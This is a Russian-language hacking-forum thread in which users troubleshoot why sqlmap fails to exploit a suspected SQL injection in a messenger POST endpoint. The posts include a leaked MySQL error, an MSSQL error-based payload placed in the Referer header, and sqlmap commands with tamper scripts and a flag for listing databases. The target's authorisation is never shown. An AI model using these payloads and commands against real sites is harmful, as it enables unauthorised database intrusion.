Старый 12.09.2018, 16:28   #1
hackworld
 
Регистрация: 12.09.2018
Сообщений: 3
Репутация: 0
По умолчанию Sqlmap не видит уязвимость

Sqlmap не видит уязвимость уже вроде все перепробывал

Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'NULL,'1\'\"','2018-09-11 22:46:00')' at line 4

POST /messenger/messenger.php
Host: test-site.com
last_message_id=%2527&message=3&limit=50

уязвимые параметры все три last_message_id,message,limit

Так же referer b user-agent
Referer: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

запрос sqlmap -u "https://test-site.com/messenger/messenger.php" --data="last_message_id=&message=3&limit=50" -p last_message_id --random-agent --level=5 --risk=3 --threads=10 --dbs

Пробывал и левел от 1-5 риск 1-3 тамперы пробывал apostrophenullencode.py charencode.py charunicodeencode.py space2mysqlblank.py unmagicquotes.py ничего не помогает не видит скулю и все причем во всех параметрах пишит ничего нет.

Какие еще запросы можно попробывать кто подскажет или это все false positive?
hackworld вне форума   Ответить с цитированием
Старый 13.09.2018, 08:28   #2
man474019
 
Регистрация: 18.02.2015
Сообщений: 52
Репутация: 0
По умолчанию

give http response with burp suite and do sqlmap -r file.txt (http response) --level=5 --risk=3
man474019 вне форума   Ответить с цитированием
Старый 14.09.2018, 23:21   #3
hackworld
 
Регистрация: 12.09.2018
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
Сообщение от man474019 Посмотреть сообщение
give http response with burp suite and do sqlmap -r file.txt (http response) --level=5 --risk=3
Делал в первую очередь не помогает
hackworld вне форума   Ответить с цитированием
Старый 01.02.2019, 10:18   #4
lenar1305
 
Регистрация: 01.02.2019
Сообщений: 2
Репутация: 0
По умолчанию

привет кто поможет ни как не могу пройти
[20:57:31] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11;
U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009070612 Gentoo Firefox/3.0.11' fr
om file 'C:\sqlmap\txt\user-agents.txt'
[20:57:31] [WARNING] you've provided target URL without any GET parameters (e.g.
'http://www.site.com/article.php?id=1') and without providing any POST paramete
rs through option '--data'
lenar1305 вне форума   Ответить с цитированием
Старый 01.02.2019, 16:51   #5
mobius07
 
Регистрация: 08.06.2018
Сообщений: 29
Репутация: 0
По умолчанию

Нет параметров которые нужно проверять, т.е. вставляешь URL типа http://site.com/test без каких-либо параметров, а нужно типа http://site.com/test?id=1. А если у тебя есть параметры передаваемые через POST то нужно будет их добавлять через параметр --data, т.е. sqlmap -u "http://site.com/test" --data="id=1&lt=3"
mobius07 вне форума   Ответить с цитированием
Старый 02.07.2019, 18:44   #6
leyka
 
Регистрация: 07.12.2017
Сообщений: 11
Репутация: 0
По умолчанию

hackworld, было подобное. В таких случаях часто выручал сканер от BurpSuite. С подключенными доп плагинами-сканерами (ActiveScan и тд. не помню точно названия).
Он находил SQLi, затем я в sqlmap в пейлоады его руками вписывал. Помогало.
leyka вне форума   Ответить с цитированием
Старый 05.07.2019, 13:59   #7
sT1myL
 
Регистрация: 09.07.2014
Сообщений: 15
Репутация: 1
По умолчанию

* поставь после равношки в уязвимом параметре, или другое значение.
sT1myL вне форума   Ответить с цитированием
Старый 19.07.2019, 13:56   #8
lenar1305
 
Регистрация: 01.02.2019
Сообщений: 2
Репутация: 0
По умолчанию

Уязвимость есть но раскрутить не могу
lenar1305 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot